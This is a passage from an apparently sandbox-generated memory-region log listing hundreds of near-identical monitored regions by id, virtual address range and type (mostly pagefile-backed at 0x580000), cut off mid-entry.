pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11633 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11634 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11635 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11636 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11637 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11638 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11639 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11640 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11641 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11642 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11643 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11644 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11646 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11647 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11648 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11649 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11650 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11651 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11652 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11653 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11654 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11655 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11656 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11657 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11658 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11659 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11660 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11661 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11662 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11663 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11664 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11665 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11666 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11667 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11668 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11669 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11670 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11671 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11672 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11673 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11674 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11675 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11676 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11677 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11678 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11679 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11680 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11681 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11682 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11683 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11684 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11685 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11686 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11687 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11688 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11689 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11690 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11691 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11692 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 11693 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11694 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11695 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11696 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11697 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11698 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11699 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11700 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11701 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11702 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11703 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11704 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11705 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11706 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11707 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11708 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11709 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11710 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11711 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11712 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11713 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11714 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11715 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11716 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11717 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11718 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11719 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11720 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11721 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11722 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11723 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11724 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11725 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11726 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11727 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11728 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11729 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11730 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11731 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11732 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11733 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11734 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11735 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11736 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11737 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11738 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11739 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11740 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11741 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11742 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11743 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11744 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11745 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11746 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11747 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11748 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11749 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11750 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11751 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11752 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11753 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11754 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11755 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11756 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11757 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11758 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11759 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11760 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11761 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11762 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11763 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11764 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11765 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11766 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11767 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11768 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11769 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11770 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11771 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11772 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11773 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11774 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11775 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11776 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11777 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11778 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11779 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11780 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11781 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11782 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11783 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11784 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11785 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11786 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11787 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11788 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11789 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11790 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11791 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11792 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11793 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11794 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11795 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11796 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11797 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11798 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11799 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11800 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11801 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11802 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11803 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11804 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11805 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11806 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11808 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11809 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11810 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 11811 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11812 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11813 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11814 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11815 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11816 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11817 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11820 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11821 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11822 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11823 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11824 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 